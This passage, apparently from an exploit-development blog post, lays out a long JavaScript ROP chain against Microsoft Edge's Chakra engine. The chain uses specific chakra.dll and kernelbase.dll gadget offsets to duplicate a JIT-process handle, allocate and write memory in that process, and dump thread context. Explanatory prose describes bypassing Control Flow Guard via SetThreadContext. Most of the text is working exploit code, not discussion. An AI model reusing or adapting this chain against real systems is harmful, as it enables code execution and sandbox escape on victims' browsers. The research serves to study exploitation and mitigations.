write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetTwo, chakraHigh); // .data section of chakra.dll where our final ROP chain is
next();                                                                       

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// VirtualAlloc() ROP chain
// Stage 7 -> Allocate some local memory to store the CONTEXT structure from GetThreadContext

// DWORD flProtect (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // PAGE_READWRITE (0x4)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// LPVOID lpAddress (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (let VirtualAlloc() decide the address)
next();

// SIZE_T dwSize (RDX) (0x4d0 = sizeof(CONTEXT))
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x000004d0, 0x00000000);             // (0x4d0 bytes)
next();

// DWORD flAllocationType (R8) ( MEM_RESERVE | MEM_COMMIT = 0x3000)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT (0x3000)
next();

// Call KERNELBASE!VirtualAlloc
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x5ac10, kernelbaseHigh); // KERNELBASE!VirtualAlloc address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAlloc)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAlloc - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();

// GetThreadContext() ROP chain
// Stage 8 -> Dump the registers of our newly created thread within the JIT process to leak the stack

// First, let's store some needed offsets of our VirtualAlloc allocation, as well as the address itself, in the .data section of kernelbase.dll
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108, kernelbaseHigh); // .data section of kernelbase.dll where we will store the VirtualAlloc allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// Save VirtualAlloc_allocation+0x30. This is the offset in our buffer (CONTEXT structure) that is ContextFlags
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll where we will store CONTEXT.ContextFlags
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// We need to set CONTEXT.ContextFlags. This address (0x30 offset from CONTEXT buffer allocated from VirtualAlloc) is in kernelbase+0x21a110
// The value we need to set is 0x10001F
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll with CONTEXT.ContextFlags address
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x0010001F, 0x00000000);             // CONTEXT_ALL
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);      // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// HANDLE hThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future mov qword [rax+0x20], rcx gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where our thread HANDLE is
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (RAX already has valid pointer)
next();

// LPCONTEXT lpContext
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108-0x8, kernelbaseHigh); // .data section of kernelbase.dll where our VirtualAlloc allocation is (our CONTEXT structure)
next();                                                                      
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

// Call KERNELBASE!GetThreadContext
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x72d10, kernelbaseHigh); // KERNELBASE!GetThreadContext address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!GetThreadContext)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);       // "return address" for KERNELBASE!GetThreadContext - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();

Using the same method of setting a breakpoint on jmp rax we can examine the first gadget in our GetThreadContext ROP chain.

We start off our GetThreadContext ROP chain by preserving the address of our previous VirtualAlloc allocation (which is still in RAX) into the .data section of kernelbase.dll.

The next thing we will do is also preserve our VirtualAlloc allocation, specifically VirtualAlloc_allocation + 0x30 into the .data section of kernelbase.dll, as well. We have already pointed out that CONTEXT.ContextFlags is located at CONTEXT + 0x30 and, since our VirtualAlloc_allocation is acting as our CONTEXT structure, we can think of this as saving our ContextFlags address within the .data section of kernelbase.dll so we can write to it later with our needed 0x10001f value. Since our original base VirtualAlloc allocation was already in RAX, we can simply just add 0x30 to it, and perform another write.

At this point we have successfully saved out CONTEXT address and our CONTEXT.ContextFlags address in memory for persistent storage, for the duration of the exploit.

The next thing we will do is update CONTEXT.ContextFlags. Since we have already preserved the address of ContextFlags in memory (.data section of kernelbase.dll), we can simply pop this address into a register, dereference it, and update it accordingly (the pop rax gadget below is, again, to bypass the cmp instruction that is a residual instruction in our ROP gadget which requires a valid, writable address).

If we actually parse our VirtualAlloc allocation as a CONTEXT structure, we can see we properly set ContextFlags.

At this point our call is in the following state:

VirtualAlloc_buffer.ContextFlags = CONTEXT_ALL		// CONTEXT_ALL = 0x10001f

GetThreadContext(
	-
	-
);

Let’s now step through more of the ROP chain and start out by retrieving our thread’s handle from the .data section of kernelbase.dll.

At this point our call is in the following state:

VirtualAlloc_buffer.ContextFlags = CONTEXT_ALL		// CONTEXT_ALL = 0x10001f

GetThreadContext(
	threadHandle,					// A handle to the thread we want to retrieve a CONTEXT structure for (our thread we created via CreateRemoteThread)
	-
);

For our last parameter, lpContext, we simply just need to pass in the pointer returned earlier from VirtualAlloc (which we stored in the .data section of kernelbase.dll). Again, we use the same mov rdx, [rdx+0x8] gadget we have seen in this blog post. So instead of directly popping the address which points to our VirtualAlloc allocation, we pass in the address - 0x8 so that when the dereference happens, the +0x8 and the -0x8 offset each other. This is done with the following ROP gadgets:

// LPCONTEXT lpContext
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108-0x8, kernelbaseHigh); // .data section of kernelbase.dll where our VirtualAlloc allocation is (our CONTEXT structure)
next();                                                                      
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

Our call, after the above gadgets, is now ready to go as such:

VirtualAlloc_buffer.ContextFlags = CONTEXT_ALL		// CONTEXT_ALL = 0x10001f

GetThreadContext(
	threadHandle,					// A handle to the thread we want to retrieve a CONTEXT structure for (our thread we created via CreateRemoteThread)
	addressof(VirtualAlloc_buffer)			// The buffer to receive the CONTEXT structure
);

After executing the call with pt we can see we successfully leaked the stack of the remote thread!

However, if we take a look at the RIP member, which should be a pointer to our ret gadget (theoretically), we can see it is not.

Instead, it is a call to RtlUserThreadStart. This makes total sense, as our thread was created in a suspended state - and wasn’t actually executed yet. So, the entry point of this thread is still on the start function. If we actually debug the JIT process and manually resume this thread (using Process Hacker, for instance), we can see execution actually fails (sorry for the WinDbg classic screenshots):

Remember earlier when I talked about the nuances of setting the entry point directly with our call to CreateRemoteThread? This is Control Flow Guard kicking in and exposing this nuance. When we set the routine for CreateRemoteThread to execute, we actually did so with a ret ROP gadget. As we know, most functions end with a ret statement - so this means we told our program we wanted to call into the end of a function. Control Flow Guard, when performing a call will check to see if the call target is a valid function. The way this manifests is through a bitmap of all known “valid call targets”. CFG will check to see if you are calling into know targets at 0x10 byte boundaries - as functions should be aligned in this manner. Since we called into a function towards the end, we obviously didn’t call in a 0x10 byte alignment and, thus, CFG will kill the process as it has deemed to have detected an invalid function (and rightly so, we were maliciously trying to call into the middle of a function). The way we can get around this, is to use a call to SetThreadContext to manually update RIP to directly execute our ROP gadget after resuming, instead of asking CreateRemoteThread to perform a call instruction to it (which CFG will check). This will require a few extra steps, but we are nearing the end now.

Manipulating RIP and Preserving RSP

The next thing we are going to do is to preserve the location of RIP and RSP from our captured thread context. We will first start by locating RSP, which is at an offset of 0x98 within a CONTEXT structure. We will persistently store this in the .data section of kernelbase.dll.

We can use the following ROP snippet (including previous chains) to store CONTEXT.Rsp and to update CONTEXT.Rip directly. Remember, when we directly act on RIP instead of asking the thread to perform a call on our gadget (which CFG checks) we can “bypass the CFG check” and, thus, just directly return back to the stack.

// alert() for debugging
alert("DEBUG");

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()
{
    counter+=0x8;
}

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Psuedo-handle to current process
next();

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
/*
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server
next();

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
next();

// VirtuaAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
/*
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx deside where we allocate memory in the JIT process)
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
